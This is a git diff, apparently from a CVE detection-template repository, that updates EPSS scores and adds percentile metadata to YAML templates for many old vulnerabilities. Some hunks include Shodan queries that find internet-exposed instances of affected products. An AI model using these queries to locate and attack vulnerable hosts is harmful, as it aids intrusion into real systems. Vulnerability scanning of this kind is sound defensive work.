http/cves/2022/CVE-2022-26263.yaml | 3 +- http/cves/2022/CVE-2022-2627.yaml | 1 + http/cves/2022/CVE-2022-2633.yaml | 5 +- http/cves/2022/CVE-2022-26352.yaml | 3 +- http/cves/2022/CVE-2022-26564.yaml | 1 + http/cves/2022/CVE-2022-26833.yaml | 3 +- http/cves/2022/CVE-2022-26960.yaml | 1 + http/cves/2022/CVE-2022-2733.yaml | 3 +- http/cves/2022/CVE-2022-2756.yaml | 3 +- http/cves/2022/CVE-2022-27593.yaml | 3 +- http/cves/2022/CVE-2022-27849.yaml | 1 + http/cves/2022/CVE-2022-27926.yaml | 3 +- http/cves/2022/CVE-2022-27927.yaml | 1 + http/cves/2022/CVE-2022-27984.yaml | 4 +- http/cves/2022/CVE-2022-27985.yaml | 3 +- http/cves/2022/CVE-2022-28022.yaml | 1 + http/cves/2022/CVE-2022-28023.yaml | 1 + http/cves/2022/CVE-2022-28032.yaml | 1 + http/cves/2022/CVE-2022-28079.yaml | 1 + http/cves/2022/CVE-2022-28080.yaml | 1 + http/cves/2022/CVE-2022-28117.yaml | 3 +- http/cves/2022/CVE-2022-28219.yaml | 1 + http/cves/2022/CVE-2022-28290.yaml | 1 + http/cves/2022/CVE-2022-28363.yaml | 3 +- http/cves/2022/CVE-2022-28365.yaml | 5 +- http/cves/2022/CVE-2022-2863.yaml | 3 +- http/cves/2022/CVE-2022-28923.yaml | 3 +- http/cves/2022/CVE-2022-28955.yaml | 3 +- http/cves/2022/CVE-2022-29004.yaml | 1 + http/cves/2022/CVE-2022-29005.yaml | 2 +- http/cves/2022/CVE-2022-29006.yaml | 1 + http/cves/2022/CVE-2022-29007.yaml | 1 + http/cves/2022/CVE-2022-29009.yaml | 1 + http/cves/2022/CVE-2022-29014.yaml | 1 + http/cves/2022/CVE-2022-29078.yaml | 5 +- http/cves/2022/CVE-2022-29153.yaml | 3 +- http/cves/2022/CVE-2022-29272.yaml | 3 +- http/cves/2022/CVE-2022-29298.yaml | 3 +- http/cves/2022/CVE-2022-29303.yaml | 5 +- http/cves/2022/CVE-2022-29349.yaml | 3 +- http/cves/2022/CVE-2022-29383.yaml | 3 +- http/cves/2022/CVE-2022-29455.yaml | 3 +- http/cves/2022/CVE-2022-29464.yaml | 5 +- http/cves/2022/CVE-2022-29548.yaml | 1 + http/cves/2022/CVE-2022-29775.yaml | 3 +- http/cves/2022/CVE-2022-30073.yaml | 1 + http/cves/2022/CVE-2022-30489.yaml | 1 + http/cves/2022/CVE-2022-30512.yaml | 3 +- http/cves/2022/CVE-2022-30513.yaml | 1 + http/cves/2022/CVE-2022-30514.yaml | 1 + http/cves/2022/CVE-2022-30525.yaml | 3 +- http/cves/2022/CVE-2022-3062.yaml | 3 +- http/cves/2022/CVE-2022-30776.yaml | 1 + http/cves/2022/CVE-2022-30777.yaml | 1 + http/cves/2022/CVE-2022-31126.yaml | 3 +- http/cves/2022/CVE-2022-31268.yaml | 3 +- http/cves/2022/CVE-2022-31269.yaml | 3 +- http/cves/2022/CVE-2022-31299.yaml | 3 +- http/cves/2022/CVE-2022-31373.yaml | 3 +- http/cves/2022/CVE-2022-31474.yaml | 3 +- http/cves/2022/CVE-2022-31499.yaml | 3 +- http/cves/2022/CVE-2022-31656.yaml | 3 +- http/cves/2022/CVE-2022-31798.yaml | 5 +- http/cves/2022/CVE-2022-31814.yaml | 4 +- http/cves/2022/CVE-2022-31845.yaml | 3 +- http/cves/2022/CVE-2022-31846.yaml | 3 +- http/cves/2022/CVE-2022-31847.yaml | 5 +- http/cves/2022/CVE-2022-31854.yaml | 3 +- http/cves/2022/CVE-2022-31879.yaml | 4 +- http/cves/2022/CVE-2022-31974.yaml | 3 +- http/cves/2022/CVE-2022-31975.yaml | 3 +- http/cves/2022/CVE-2022-31976.yaml | 3 +- http/cves/2022/CVE-2022-31977.yaml | 3 +- http/cves/2022/CVE-2022-31978.yaml | 3 +- http/cves/2022/CVE-2022-31980.yaml | 3 +- http/cves/2022/CVE-2022-31981.yaml | 3 +- http/cves/2022/CVE-2022-31982.yaml | 3 +- http/cves/2022/CVE-2022-31983.yaml | 3 +- http/cves/2022/CVE-2022-31984.yaml | 3 +- http/cves/2022/CVE-2022-32007.yaml | 3 +- http/cves/2022/CVE-2022-32015.yaml | 3 +- http/cves/2022/CVE-2022-32018.yaml | 3 +- http/cves/2022/CVE-2022-32022.yaml | 3 +- http/cves/2022/CVE-2022-32024.yaml | 3 +- http/cves/2022/CVE-2022-32025.yaml | 3 +- http/cves/2022/CVE-2022-32026.yaml | 3 +- http/cves/2022/CVE-2022-32028.yaml | 3 +- http/cves/2022/CVE-2022-32094.yaml | 3 +- http/cves/2022/CVE-2022-32195.yaml | 1 + http/cves/2022/CVE-2022-32409.yaml | 5 +- http/cves/2022/CVE-2022-32429.yaml | 3 +- http/cves/2022/CVE-2022-32444.yaml | 3 +- http/cves/2022/CVE-2022-32770.yaml | 3 +- http/cves/2022/CVE-2022-32771.yaml | 3 +- http/cves/2022/CVE-2022-32772.yaml | 3 +- http/cves/2022/CVE-2022-33119.yaml | 3 +- http/cves/2022/CVE-2022-33174.yaml | 3 +- http/cves/2022/CVE-2022-33891.yaml | 5 +- http/cves/2022/CVE-2022-33901.yaml | 3 +- http/cves/2022/CVE-2022-33965.yaml | 3 +- http/cves/2022/CVE-2022-34045.yaml | 3 +- http/cves/2022/CVE-2022-34046.yaml | 3 +- http/cves/2022/CVE-2022-34047.yaml | 3 +- http/cves/2022/CVE-2022-34048.yaml | 3 +- http/cves/2022/CVE-2022-34049.yaml | 3 +- http/cves/2022/CVE-2022-34121.yaml | 3 +- http/cves/2022/CVE-2022-34328.yaml | 3 +- http/cves/2022/CVE-2022-34576.yaml | 3 +- http/cves/2022/CVE-2022-34590.yaml | 3 +- http/cves/2022/CVE-2022-34753.yaml | 3 +- http/cves/2022/CVE-2022-3484.yaml | 1 + http/cves/2022/CVE-2022-3506.yaml | 1 + http/cves/2022/CVE-2022-35151.yaml | 3 +- http/cves/2022/CVE-2022-35405.yaml | 4 +- http/cves/2022/CVE-2022-35413.yaml | 3 +- http/cves/2022/CVE-2022-35416.yaml | 3 +- http/cves/2022/CVE-2022-35493.yaml | 3 +- http/cves/2022/CVE-2022-3578.yaml | 1 + http/cves/2022/CVE-2022-35914.yaml | 3 +- http/cves/2022/CVE-2022-36446.yaml | 3 +- http/cves/2022/CVE-2022-36537.yaml | 3 +- http/cves/2022/CVE-2022-36642.yaml | 3 +- http/cves/2022/CVE-2022-36804.yaml | 7 +- http/cves/2022/CVE-2022-36883.yaml | 3 +- http/cves/2022/CVE-2022-37042.yaml | 5 +- http/cves/2022/CVE-2022-37153.yaml | 1 + http/cves/2022/CVE-2022-37190.yaml | 3 +- http/cves/2022/CVE-2022-37191.yaml | 3 +- http/cves/2022/CVE-2022-37299.yaml | 3 +- http/cves/2022/CVE-2022-3768.yaml | 3 +- http/cves/2022/CVE-2022-3800.yaml | 3 +- http/cves/2022/CVE-2022-38295.yaml | 3 +- http/cves/2022/CVE-2022-38296.yaml | 3 +- http/cves/2022/CVE-2022-38463.yaml | 3 +- http/cves/2022/CVE-2022-38467.yaml | 1 + http/cves/2022/CVE-2022-38553.yaml | 3 +- http/cves/2022/CVE-2022-38637.yaml | 3 +- http/cves/2022/CVE-2022-38794.yaml | 3 +- http/cves/2022/CVE-2022-38817.yaml | 4 +- http/cves/2022/CVE-2022-38870.yaml | 3 +- http/cves/2022/CVE-2022-3908.yaml | 3 +- http/cves/2022/CVE-2022-39195.yaml | 1 + http/cves/2022/CVE-2022-3933.yaml | 3 +- http/cves/2022/CVE-2022-3934.yaml | 3 +- http/cves/2022/CVE-2022-3980.yaml | 3 +- http/cves/2022/CVE-2022-3982.yaml | 3 +- http/cves/2022/CVE-2022-39952.yaml | 5 +- http/cves/2022/CVE-2022-39960.yaml | 3 +- http/cves/2022/CVE-2022-39986.yaml | 9 +- http/cves/2022/CVE-2022-40022.yaml | 3 +- http/cves/2022/CVE-2022-40083.yaml | 3 +- http/cves/2022/CVE-2022-40127.yaml | 3 +- http/cves/2022/CVE-2022-40359.yaml | 3 +- http/cves/2022/CVE-2022-4050.yaml | 3 +- http/cves/2022/CVE-2022-4057.yaml | 3 +- http/cves/2022/CVE-2022-4060.yaml | 1 + http/cves/2022/CVE-2022-4063.yaml | 3 +- http/cves/2022/CVE-2022-40684.yaml | 5 +- http/cves/2022/CVE-2022-40734.yaml | 3 +- http/cves/2022/CVE-2022-40843.yaml | 11 +- http/cves/2022/CVE-2022-40879.yaml | 3 +- http/cves/2022/CVE-2022-40881.yaml | 3 +- http/cves/2022/CVE-2022-4117.yaml | 3 +- http/cves/2022/CVE-2022-4140.yaml | 3 +- http/cves/2022/CVE-2022-41441.yaml | 3 +- http/cves/2022/CVE-2022-41473.yaml | 3 +- http/cves/2022/CVE-2022-41840.yaml | 3 +- http/cves/2022/CVE-2022-42094.yaml | 1 + http/cves/2022/CVE-2022-42095.yaml | 1 + http/cves/2022/CVE-2022-42096.yaml | 1 + http/cves/2022/CVE-2022-42233.yaml | 3 +- http/cves/2022/CVE-2022-4260.yaml | 3 +- http/cves/2022/CVE-2022-42746.yaml | 1 + http/cves/2022/CVE-2022-42747.yaml | 1 + http/cves/2022/CVE-2022-42748.yaml | 1 + http/cves/2022/CVE-2022-42749.yaml | 1 + http/cves/2022/CVE-2022-4295.yaml | 1 + http/cves/2022/CVE-2022-4301.yaml | 3 +- http/cves/2022/CVE-2022-43014.yaml | 1 + http/cves/2022/CVE-2022-43015.yaml | 1 + http/cves/2022/CVE-2022-43016.yaml | 1 + http/cves/2022/CVE-2022-43017.yaml | 1 + http/cves/2022/CVE-2022-43018.yaml | 1 + http/cves/2022/CVE-2022-4306.yaml | 1 + http/cves/2022/CVE-2022-43140.yaml | 3 +- http/cves/2022/CVE-2022-43164.yaml | 3 +- http/cves/2022/CVE-2022-43165.yaml | 3 +- http/cves/2022/CVE-2022-43166.yaml | 3 +- http/cves/2022/CVE-2022-43167.yaml | 3 +- http/cves/2022/CVE-2022-43169.yaml | 3 +- http/cves/2022/CVE-2022-43170.yaml | 3 +- http/cves/2022/CVE-2022-43185.yaml | 3 +- http/cves/2022/CVE-2022-4320.yaml | 1 + http/cves/2022/CVE-2022-4321.yaml | 1 + http/cves/2022/CVE-2022-4325.yaml | 3 +- http/cves/2022/CVE-2022-4328.yaml | 1 + http/cves/2022/CVE-2022-43769.yaml | 3 +- http/cves/2022/CVE-2022-4447.yaml | 3 +- http/cves/2022/CVE-2022-44877.yaml | 3 +- http/cves/2022/CVE-2022-44944.yaml | 3 +- http/cves/2022/CVE-2022-44946.yaml | 3 +- http/cves/2022/CVE-2022-44947.yaml | 3 +- http/cves/2022/CVE-2022-44948.yaml | 3 +- http/cves/2022/CVE-2022-44949.yaml | 3 +- http/cves/2022/CVE-2022-44950.yaml | 3 +- http/cves/2022/CVE-2022-44951.yaml | 3 +- http/cves/2022/CVE-2022-44952.yaml | 3 +- http/cves/2022/CVE-2022-45037.yaml | 1 + http/cves/2022/CVE-2022-45038.yaml | 1 + http/cves/2022/CVE-2022-45805.yaml | 5 +- http/cves/2022/CVE-2022-45835.yaml | 4 +- http/cves/2022/CVE-2022-45917.yaml | 1 + http/cves/2022/CVE-2022-45933.yaml | 5 +- http/cves/2022/CVE-2022-46020.yaml | 3 +- http/cves/2022/CVE-2022-46071.yaml | 3 +- http/cves/2022/CVE-2022-46073.yaml | 3 +- http/cves/2022/CVE-2022-46169.yaml | 3 +- http/cves/2022/CVE-2022-46381.yaml | 3 +- http/cves/2022/CVE-2022-46443.yaml | 8 +- http/cves/2022/CVE-2022-46463.yaml | 9 ++ http/cves/2022/CVE-2022-46888.yaml | 1 + http/cves/2022/CVE-2022-46934.yaml | 1 + http/cves/2022/CVE-2022-47002.yaml | 3 +- http/cves/2022/CVE-2022-47003.yaml | 3 +- http/cves/2022/CVE-2022-47615.yaml | 9 +- http/cves/2022/CVE-2022-47945.yaml | 2 + http/cves/2022/CVE-2022-47966.yaml | 3 +- http/cves/2022/CVE-2022-47986.yaml | 3 +- http/cves/2022/CVE-2022-48012.yaml | 1 + http/cves/2022/CVE-2022-48165.yaml | 3 +- http/cves/2022/CVE-2022-4897.yaml | 1 + http/cves/2023/CVE-2023-0099.yaml | 1 + http/cves/2023/CVE-2023-0126.yaml | 3 +- http/cves/2023/CVE-2023-0236.yaml | 1 + http/cves/2023/CVE-2023-0261.yaml | 3 +- http/cves/2023/CVE-2023-0297.yaml | 3 +- http/cves/2023/CVE-2023-0448.yaml | 11 +- http/cves/2023/CVE-2023-0514.yaml | 1 + http/cves/2023/CVE-2023-0527.yaml | 3 +- http/cves/2023/CVE-2023-0552.yaml | 1 + http/cves/2023/CVE-2023-0562.yaml | 3 +- http/cves/2023/CVE-2023-0563.yaml | 3 +- http/cves/2023/CVE-2023-0630.yaml | 1 + http/cves/2023/CVE-2023-0669.yaml | 3 +- http/cves/2023/CVE-2023-0942.yaml | 3 +- http/cves/2023/CVE-2023-0948.yaml | 1 + http/cves/2023/CVE-2023-0968.yaml | 3 +- http/cves/2023/CVE-2023-1020.yaml | 3 +- http/cves/2023/CVE-2023-1080.yaml | 3 +- http/cves/2023/CVE-2023-1177.yaml | 3 +- http/cves/2023/CVE-2023-1362.yaml | 1 + http/cves/2023/CVE-2023-1454.yaml | 1 + http/cves/2023/CVE-2023-1496.yaml | 1 + http/cves/2023/CVE-2023-1546.yaml | 12 +- http/cves/2023/CVE-2023-1671.yaml | 3 +- http/cves/2023/CVE-2023-1698.yaml | 8 +- http/cves/2023/CVE-2023-1730.yaml | 3 +- http/cves/2023/CVE-2023-1835.yaml | 3 +- http/cves/2023/CVE-2023-1890.yaml | 3 +- http/cves/2023/CVE-2023-20073.yaml | 7 +- http/cves/2023/CVE-2023-2023.yaml | 7 +- http/cves/2023/CVE-2023-20864.yaml | 3 +- http/cves/2023/CVE-2023-20887.yaml | 4 +- http/cves/2023/CVE-2023-20888.yaml | 1 + http/cves/2023/CVE-2023-20889.yaml | 3 +- http/cves/2023/CVE-2023-2122.yaml | 6 + http/cves/2023/CVE-2023-2130.yaml | 3 +- http/cves/2023/CVE-2023-2178.yaml | 12 +- http/cves/2023/CVE-2023-22478.yaml | 8 ++ http/cves/2023/CVE-2023-22480.yaml | 11 +- http/cves/2023/CVE-2023-22620.yaml | 3 +- http/cves/2023/CVE-2023-2272.yaml | 6 + http/cves/2023/CVE-2023-22897.yaml | 3 +- http/cves/2023/CVE-2023-23161.yaml | 6 +- http/cves/2023/CVE-2023-23333.yaml | 3 +- http/cves/2023/CVE-2023-23488.yaml | 3 +- http/cves/2023/CVE-2023-23489.yaml | 3 +- http/cves/2023/CVE-2023-23491.yaml | 11 +- http/cves/2023/CVE-2023-23492.yaml | 3 +- http/cves/2023/CVE-2023-2356.yaml | 3 +- http/cves/2023/CVE-2023-23752.yaml | 3 +- http/cves/2023/CVE-2023-24044.yaml | 3 +- http/cves/2023/CVE-2023-24243.yaml | 1 + http/cves/2023/CVE-2023-24278.yaml | 1 + http/cves/2023/CVE-2023-24322.yaml | 1 + http/cves/2023/CVE-2023-24488.yaml | 3 +- http/cves/2023/CVE-2023-24489.yaml | 12 +- http/cves/2023/CVE-2023-24657.yaml | 1 + http/cves/2023/CVE-2023-24733.yaml | 1 + http/cves/2023/CVE-2023-24735.yaml | 3 +- http/cves/2023/CVE-2023-24737.yaml | 1 + http/cves/2023/CVE-2023-25135.yaml | 3 +- http/cves/2023/CVE-2023-25157.yaml | 3 +- http/cves/2023/CVE-2023-25346.yaml | 1 + http/cves/2023/CVE-2023-25717.yaml | 3 +- http/cves/2023/CVE-2023-26067.yaml | 7 +- http/cves/2023/CVE-2023-26255.yaml | 3 +- http/cves/2023/CVE-2023-26256.yaml | 3 +- http/cves/2023/CVE-2023-26360.yaml | 3 +- http/cves/2023/CVE-2023-26469.yaml | 11 +- http/cves/2023/CVE-2023-26842.yaml | 1 + http/cves/2023/CVE-2023-26843.yaml | 1 + http/cves/2023/CVE-2023-27008.yaml | 1 + http/cves/2023/CVE-2023-27034.yaml | 12 +- http/cves/2023/CVE-2023-27159.yaml | 3 +- http/cves/2023/CVE-2023-27179.yaml | 3 +- http/cves/2023/CVE-2023-27292.yaml | 1 + http/cves/2023/CVE-2023-2732.yaml | 1 + http/cves/2023/CVE-2023-27350.yaml | 3 +- http/cves/2023/CVE-2023-27372.yaml | 3 +- http/cves/2023/CVE-2023-27482.yaml | 1 + http/cves/2023/CVE-2023-27524.yaml | 3 +- http/cves/2023/CVE-2023-27587.yaml | 3 +- http/cves/2023/CVE-2023-2780.yaml | 3 +- http/cves/2023/CVE-2023-2796.yaml | 4 +- http/cves/2023/CVE-2023-28121.yaml | 3 +- http/cves/2023/CVE-2023-2822.yaml | 3 +- http/cves/2023/CVE-2023-2825.yaml | 1 + http/cves/2023/CVE-2023-28343.yaml | 3 +- http/cves/2023/CVE-2023-28432.yaml | 3 +- http/cves/2023/CVE-2023-28665.yaml | 12 +- http/cves/2023/CVE-2023-29084.yaml | 3 +- http/cves/2023/CVE-2023-29298.yaml | 9 +- http/cves/2023/CVE-2023-29300.yaml | 4 +- http/cves/2023/CVE-2023-29489.yaml | 3 +- http/cves/2023/CVE-2023-29622.yaml | 3 +- http/cves/2023/CVE-2023-29623.yaml | 1 + http/cves/2023/CVE-2023-2982.yaml | 3 +- http/cves/2023/CVE-2023-29887.yaml | 1 + http/cves/2023/CVE-2023-29919.yaml | 3 +- http/cves/2023/CVE-2023-29922.yaml | 3 +- http/cves/2023/CVE-2023-29923.yaml | 1 + http/cves/2023/CVE-2023-30019.yaml | 3 +- http/cves/2023/CVE-2023-30150.yaml | 9 +- http/cves/2023/CVE-2023-30210.yaml | 1 + http/cves/2023/CVE-2023-30212.yaml | 1 + http/cves/2023/CVE-2023-30256.yaml | 3 +- http/cves/2023/CVE-2023-30777.yaml | 1 + http/cves/2023/CVE-2023-31059.yaml | 3 +- http/cves/2023/CVE-2023-31548.yaml | 1 + http/cves/2023/CVE-2023-32117.yaml | 2 +- http/cves/2023/CVE-2023-32235.yaml | 1 + http/cves/2023/CVE-2023-32243.yaml | 13 ++- http/cves/2023/CVE-2023-32315.yaml | 5 +- http/cves/2023/CVE-2023-32563.yaml | 4 +- http/cves/2023/CVE-2023-33338.yaml | 3 +- http/cves/2023/CVE-2023-33439.yaml | 3 +- http/cves/2023/CVE-2023-33440.yaml | 3 +- http/cves/2023/CVE-2023-3345.yaml | 11 +- http/cves/2023/CVE-2023-33510.yaml | 3 +- http/cves/2023/CVE-2023-33568.yaml | 1 + http/cves/2023/CVE-2023-34124.yaml | 14 ++- http/cves/2023/CVE-2023-34362.yaml | 5 +- http/cves/2023/CVE-2023-34537.yaml | 1 + http/cves/2023/CVE-2023-34598.yaml | 1 + http/cves/2023/CVE-2023-34599.yaml | 3 +- http/cves/2023/CVE-2023-3460.yaml | 4 +- http/cves/2023/CVE-2023-34659.yaml | 3 +- http/cves/2023/CVE-2023-3479.yaml | 3 +- http/cves/2023/CVE-2023-34843.yaml | 1 + http/cves/2023/CVE-2023-34960.yaml | 15 ++- http/cves/2023/CVE-2023-35078.yaml | 10 +- http/cves/2023/CVE-2023-35082.yaml | 12 +- http/cves/2023/CVE-2023-35843.yaml | 1 + http/cves/2023/CVE-2023-35844.yaml | 1 + http/cves/2023/CVE-2023-35885.yaml | 4 +- http/cves/2023/CVE-2023-36287.yaml | 3 +- http/cves/2023/CVE-2023-36289.yaml | 3 +- http/cves/2023/CVE-2023-36346.yaml | 1 + http/cves/2023/CVE-2023-36844.yaml | 11 +- http/cves/2023/CVE-2023-36934.yaml | 3 +- http/cves/2023/CVE-2023-37265.yaml | 12 +- http/cves/2023/CVE-2023-37266.yaml | 11 +- http/cves/2023/CVE-2023-37270.yaml | 14 ++- http/cves/2023/CVE-2023-37462.yaml | 17 ++- http/cves/2023/CVE-2023-37580.yaml | 14 ++- http/cves/2023/CVE-2023-3765.yaml | 10 +- http/cves/2023/CVE-2023-38035.yaml | 10 +- http/cves/2023/CVE-2023-38205.yaml | 4 +- http/cves/2023/CVE-2023-3836.yaml | 14 ++- http/cves/2023/CVE-2023-38646.yaml | 15 ++- http/cves/2023/CVE-2023-39026.yaml | 9 ++ http/cves/2023/CVE-2023-39141.yaml | 10 ++ http/cves/2023/CVE-2023-39143.yaml | 11 +- http/cves/2023/CVE-2023-3936.yaml | 13 ++- http/cves/2023/CVE-2023-4173.yaml | 18 ++- http/cves/2023/CVE-2023-4174.yaml | 17 ++- 1999 files changed, 3745 insertions(+), 1399 deletions(-) diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 0f50435ab9..066c77444f 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -17,6 +17,7 @@ info: cwe-id: NVD-CWE-Other epss-score: 0.09258 cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* + epss-percentile: 0.93895 metadata: max-request: 1 vendor: microsoft diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index c0c83df526..47e397a19a 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.3 cve-id: CVE-2001-0537 cwe-id: CWE-287 - epss-score: 0.89071 + epss-score: 0.88063 cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* + epss-percentile: 0.9824 metadata: max-request: 1 verified: true diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 8243b9f833..cfbaf5b880 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-80 epss-score: 0.06018 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* + epss-percentile: 0.9253 metadata: max-request: 5 vendor: squirrelmail diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index 1de7475149..40143f9958 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -19,6 +19,7 @@ info: cwe-id: NVD-CWE-Other epss-score: 0.02285 cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:* + epss-percentile: 0.88244 metadata: max-request: 1 vendor: sgi diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index 8236b3fc1f..749de068b3 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -18,6 +18,7 @@ info: cwe-id: NVD-CWE-Other epss-score: 0.0113 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* + epss-percentile: 0.82864 metadata: max-request: 1 vendor: openbb diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index d3011ef96d..fc6dc4b670 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-200 epss-score: 0.01188 cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* + epss-percentile: 0.83354 metadata: max-request: 1 vendor: ibm diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index c2fbf2f55a..32e44d9bb5 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -18,6 +18,7 @@ info: cwe-id: NVD-CWE-Other epss-score: 0.02158 cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* + epss-percentile: 0.87895 metadata: max-request: 2 vendor: horde diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 3be084b3d8..f97265581d 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -20,6 +20,7 @@ info: cwe-id: NVD-CWE-Other epss-score: 0.02843 cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* + epss-percentile: 0.89376 metadata: max-request: 1 shodan-query: html:"SAP Business Server Pages Team" diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 53ef9e9d0e..8fb587280c 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -16,6 +16,7 @@ info: cwe-id: NVD-CWE-Other epss-score: 0.00294 cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:* + epss-percentile: 0.65316 metadata: max-request: 1 vendor: cofax diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 0cb4e34c71..55fd90bb63 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -17,6 +17,7 @@ info: cwe-id: NVD-CWE-Other epss-score: 0.01015 cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* + epss-percentile: 0.81872 metadata: max-request: 1 vendor: cherokee diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index df57a144c1..81e94fa41e 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.2925 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* + epss-percentile: 0.96295 metadata: max-request: 1 vendor: squirrelmail diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 646e83cddf..5e51fe4524 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.8 cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other - epss-score: 0.00694 + epss-score: 0.0059 cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* + epss-percentile: 0.75518 metadata: max-request: 1 vendor: rainbow_portal diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 55d094a781..336f8dae64 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.01677 cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* + epss-percentile: 0.86094 metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 277a1a6504..574d190962 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -19,6 +19,7 @@ info: cwe-id: NVD-CWE-Other epss-score: 0.14147 cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* + epss-percentile: 0.94981 metadata: max-request: 1 vendor: opensymphony diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 5c55600307..f6dfc4146b 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.3 cve-id: CVE-2007-5728 cwe-id: CWE-79 - epss-score: 0.03308 + epss-score: 0.02361 cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* + epss-percentile: 0.8841 metadata: max-request: 1 shodan-query: http.title:"phpPgAdmin" diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index c1db177cb9..9a00317853 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-94 epss-score: 0.01493 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* + epss-percentile: 0.85218 metadata: max-request: 1 vendor: wordpress diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 9778fb65f2..c7c880b9f0 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00938 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* + epss-percentile: 0.81093 metadata: max-request: 1 vendor: wordpress diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index e290bc9c53..ce8f0401d5 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-601 epss-score: 0.03523 cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* + epss-percentile: 0.90347 metadata: max-request: 2 shodan-query: http.title:"Outlook" diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index b214ef291f..e4f502305f 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 